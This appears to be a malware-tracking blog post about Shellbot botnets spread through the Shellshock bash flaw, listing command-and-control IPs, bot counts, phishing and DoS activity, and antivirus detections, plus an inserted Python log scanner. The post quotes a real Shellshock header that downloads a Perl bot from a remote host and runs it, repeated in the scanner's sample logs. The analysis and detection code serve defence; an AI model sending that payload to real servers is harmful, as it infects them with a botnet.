Perl.Shellbot by Shellshock Bash Attack

My first script kiddie caught through the Shellshock Bash attack, yesterday 🙂

Leading to PHP.ShellBot – server 185.31.209.84

inetnum:        185.31.208.0 – 185.31.209.255
netname:        SIM-NETWORKS
descr:          SIM-Networks Professional Hosting Solutions
country:        DE
admin-c:        SD9104-RIPE
tech-c:         SD9104-RIPE
status:         ASSIGNED PA
mnt-by:         SIMNETWORKS-MNT
source:         RIPE # Filtered
mnt-routes:     SIMNETWORKS-MNT
mnt-domains:    SIMNETWORKS-MNT

~713 clients – if these are bots, this is not bad 🙂


Interesting bots:

They seem to be Romanian.


The abuse desk made a move: the IRCd has been taken down.

They need to rebuild everything.

EDIT – 2014 September 28

Another spotted yesterday :

94.102.63.238 – ~3000 bots

Today, the channel is restricted; they have reached 3900 bots.
I think they have stopped populating this server.

EDIT – September 30: zoom on two botnets' activities

Group 213.5.67.223

They install a shell in order to sell it:

[screenshot]

but the main activity is phishing email:

[screenshot]

The script gives spam capability:

[screenshot]

Some phishing examples – seems to be bank phishing:

[screenshot]

A DoS group

Another group, from dl.directxex.net/dl/nice.png, also spreading through the Shellshock Bash vulnerability.

[screenshot]

This init script then downloads other scripts from ftp://37.59.68.12/pub/:

[screenshot]

The bots connect to 37.59.68.5. This group carries out DoS attacks.

[screenshot]

EDIT – 2015 February 4

Still around, and the same actor.

Two attempts:

http://www.malekal.com/modsec/index.php?ip=209.236.133.201
http://www.malekal.com/modsec/index.php?ip=64.187.99.130

Two different scripts, but both connect to 46.4.83.92.

inetnum:        46.4.83.64 – 46.4.83.95
netname:        HETZNER-RZ14
descr:          Hetzner Online AG
descr:          Datacenter 14
country:        DE
admin-c:        HOAC1-RIPE
tech-c:         HOAC1-RIPE
status:         ASSIGNED PA
mnt-by:         HOS-GUN
mnt-lower:      HOS-GUN
mnt-routes:     HOS-GUN
source:         RIPE # Filtered


Around 700 bots on this server.


EDIT – 2015 December

Still around:

http://www.malekal.com/modsec/index.php?ip=69.12.70.34
http://www.malekal.com/modsec/index.php?ip=67.205.111.9

User-Agent: () { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://188.138.69.229/gnu;curl -O http://188.138.69.229/gnu;wget http://188.138.69.229/gnu;perl /tmp/gnu*;perl gnu;rm -rf /tmp/gnu*"
X-Forwarded-For: 67.205.111.9
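The request above is the whole infection vector: a bash function definition in a header, followed by the commands that fetch and run the bot. As an added example (not code from the original post), the following Python scans Apache combined-format log lines for that header pattern and pulls out the download URLs the payload references, which are the indicators a defender would block or watch for in egress traffic. The log lines are constructed for the example (the first reproduces the probe quoted above in log form; the other addresses are RFC 5737 documentation ranges); the regexes and function names are this example's own.

```python
import re
from urllib.parse import urlsplit

# A Shellshock probe places a bash function definition, "() { ... };", in a
# request header that a CGI handler exports as an environment variable; the
# commands after the closing "};" are what a vulnerable bash then runs.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Download locations named in the payload (where the bot script is hosted)
# are the indicators worth blocking and watching for in egress logs.
URL_RE = re.compile(r"""(?:https?|ftp)://[^\s;"']+""")

# Apache "combined" log format. The quoted Referer and User-Agent fields may
# contain \" escapes, which the alternation in _QUOTED steps over.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"'
)

# Constructed sample log lines (not from the page's logs): the probe quoted
# above in combined-log form, a benign hit, a Referer-based variant using
# RFC 5737 documentation addresses, and a malformed line.
LOG_LINES = [
    '67.205.111.9 - - [07/Dec/2015:10:14:33 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"cd /tmp;lwp-download -a http://188.138.69.229/gnu;'
    'curl -O http://188.138.69.229/gnu;wget http://188.138.69.229/gnu;'
    'perl /tmp/gnu*;perl gnu;rm -rf /tmp/gnu*\\""',
    '198.51.100.7 - - [07/Dec/2015:10:15:02 +0100] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [07/Dec/2015:10:16:40 +0100] "GET /cgi-bin/status HTTP/1.0" 200 77 '
    '"() { :; }; /usr/bin/wget ftp://203.0.113.9/pub/x.pl -O /tmp/x.pl" "curl/7.35.0"',
    "this is not a log line",
]


def parse_combined(line):
    """Split one combined-format line into its fields, or return None."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    for key in ("referer", "ua"):
        # Undo the log writer's \" escaping so the header reads as it was sent
        rec[key] = rec[key].replace('\\"', '"')
    return rec


def scan(lines):
    """Return one finding per request whose Referer or User-Agent carries a
    Shellshock-style function definition, with the URLs the payload fetches."""
    findings = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # unparseable line: skip it, never raise mid-scan
        for field, header in (("ua", "User-Agent"), ("referer", "Referer")):
            value = rec[field]
            if not SHELLSHOCK_RE.search(value):
                continue
            urls = sorted(set(URL_RE.findall(value)))
            findings.append({
                "src_ip": rec["ip"],
                "timestamp": rec["ts"],
                "request": rec["request"],
                "header": header,
                "urls": urls,
                "hosts": sorted({urlsplit(u).hostname for u in urls}),
            })
    return findings


if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f"{f['timestamp']} {f['src_ip']} {f['header']}: {f['request']}")
        for host in f["hosts"]:
            print(f"    payload host: {host}")
```

The pattern is matched on the whole header value rather than on the literal `() { :;};` string, because the body between the braces varies between scripts; checking both User-Agent and Referer covers the two headers most CGI setups export into the environment. Feed it `sys.stdin` or an open access log instead of `LOG_LINES` to run it over real traffic.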

The IRCd C&C is at 46.4.132.212.

[screenshot]

He is running a phishing campaign against a Spanish bank, « laCaixa ».

[screenshot]

EDIT – January 2016

Still around, at iweb/privatedns, but no reply from the abuse desk.
https://twitter.com/malekal_morte/status/673105128757575680
https://twitter.com/malekal_morte/status/565176780869599233

[screenshot: 23.95.6.90]

Still phishing:

[screenshot]

EDIT: JB is using a backdoor to keep a second channel of control over the bots if the IRCd is taken down.
Dr.WEB does not detect this one, so Plesk is not protected; I will try to get them to add it: https://twitter.com/malekal_morte/status/690597750614953984
I already sent this backdoor some weeks ago; detection is now 12/54 on VirusTotal.

SHA256: e0b86ff4e89e1a24ae894c71b9d6e30fa1097676c8ef46cede50ab40e34d16d4
File name: b.pl
Detection ratio: 12 / 54
Analysis date: 2016-01-25 08:42:51 UTC (2 minutes ago)

Antivirus           Result                        Update
Agnitum             Perl.Shellbot.T               20160124
Avast               PHP:Agent-AO [Trj]            20160125
ClamAV              Trojan.Perlscript             20160125
ESET-NOD32          Perl/Small.L                  20160125
GData               Script.Trojan.Agent.V6OX3T    20160125
Ikarus              Trojan.Perl.Small             20160125
McAfee              Perl/Generic Backdoor.a       20160125
McAfee-GW-Edition   Perl/Generic Backdoor.a       20160125
Microsoft           Backdoor:Perl/Small.B         20160125
NANO-Antivirus      Trojan.Script.Agent.bowhye    20160125
Qihoo-360           Script/Trojan.25f             20160125
Sophos              Troj/CBShell-A                20160125

[screenshot]

After a few IRCd take-downs, the infrastructure is now fully in Russia:

62.109.19.113 62.109.19.114

That cost him around ~200 bots – it now seems hard for him to reach 500 bots.

[screenshot]
